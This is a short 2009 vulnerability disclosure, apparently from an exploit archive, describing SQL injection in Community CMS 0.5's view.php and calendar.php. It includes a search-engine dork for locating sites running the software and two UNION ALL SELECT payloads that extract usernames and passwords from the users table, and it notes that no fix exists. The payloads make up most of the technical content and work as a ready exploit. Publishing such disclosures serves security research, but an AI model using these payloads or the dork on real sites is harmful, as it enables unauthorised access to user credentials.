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Community CMS 0.5 - Multiple SQL Injections

🗓️ 31 Mar 2009 00:00:00Reported by Salvatore FrestaType 

Community CMS 0.5 Multiple SQL Injections - Remote Exploi

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*******   Salvatore "drosophila" Fresta   *******

[+] Application: Community CMS
[+] Version: 0.5
[+] Website:

[+] Bugs: [A] Multiple SQL Injection

[+] Exploitation: Remote
[+] Dork: intext:"Powered by Community CMS"
[+] Date: 30 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]


[+] Menu

1) Bugs
2) Code
3) Fix


[+] Bugs

- [A] SQL Injection

[-] File affected: view.php, calendar.php

This bug allows a guest to view username and password of a registered user.


[+] Code

- [A] Multiple SQL Injection UNION ALL SELECT 1,2,username,password,5,6,7,8,9 FROM comcms_users UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a, password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23


[+] Fix

No fix.


# [2009-03-31]

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